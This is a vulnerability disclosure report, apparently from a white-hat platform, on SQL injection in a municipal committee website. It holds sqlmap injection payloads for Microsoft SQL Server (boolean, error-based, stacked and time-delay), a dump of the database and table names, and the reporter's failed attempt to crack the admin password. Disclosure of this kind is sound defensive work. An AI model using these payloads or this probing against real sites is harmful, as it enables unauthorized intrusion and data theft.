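2015-09-19: Details reported to the vendor; awaiting vendor response
2015-09-23: Vendor confirmed; details disclosed to the vendor only
2015-10-03: Details disclosed to core white hats and relevant domain experts
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public
SQL injection in a municipal institutional establishment committee website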
http://**.**.**.**/AnnShow.aspx?ID=37 (GET)
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=37 AND 2648=2648

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=37 AND 2579=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2579=2579) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ID=37; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ID=37 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] 5
[*] JGBJ
[*] master
[*] model
[*] msdb

Database: JGBJ
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| dbo.C_MailBox         | 2783    |
| dbo.C_Msg             | 2188    |
| dbo.C_News            | 424     |
| dbo.C_MenuFunction    | 56      |
| dbo.C_FW              | 55      |
| dbo.temp              | 42      |
| dbo.C_Video           | 32      |
| dbo.C_FriendSite      | 31      |
| dbo.C_Hn              | 23      |
| dbo.C_Announce        | 21      |
| dbo.C_ZC              | 21      |
| dbo.C_Business        | 18      |
| dbo.C_SD              | 16      |
| dbo.C_File            | 15      |
| dbo.C_Hn_Type         | 12      |
| dbo.C_Announce_Type   | 6       |
| dbo.C_FW_Type         | 6       |
| dbo.C_ZC_Type         | 6       |
| dbo.C_MenuSubFunction | 5       |
| dbo.C_Video_Type      | 5       |
| dbo.C_XXGK_Type       | 5       |
| dbo.C_Introduce       | 4       |
| dbo.C_News_Type       | 3       |
| dbo.C_UsersNews       | 3       |
| dbo.D99_CMD           | 3       |
| dbo.D99_Tmp           | 3       |
| dbo.C_Admin           | 2       |
| dbo.C_Business_Type   | 2       |
| dbo.C_SD_Type         | 2       |
| dbo.C_User            | 2       |
| dbo.C_Users_Type      | 2       |
| dbo.C_File_Type       | 1       |
| dbo.C_Lead            | 1       |
+-----------------------+---------+
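I originally wanted to get into the admin backend to take a look, but the password was too tough and I could not crack it. Admin backend: http://**.**.**.**/WebSys/SysLogin.aspx
So I did not get in...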
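Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-09-23 14:50
Thank you very much for your report. The issue described in the report has been confirmed and reproduced. Data affected: high. Attack cost: low. Resulting impact: high. Overall rating: high, rank: 10. We are contacting the organization that manages the website to have it handled.
None yet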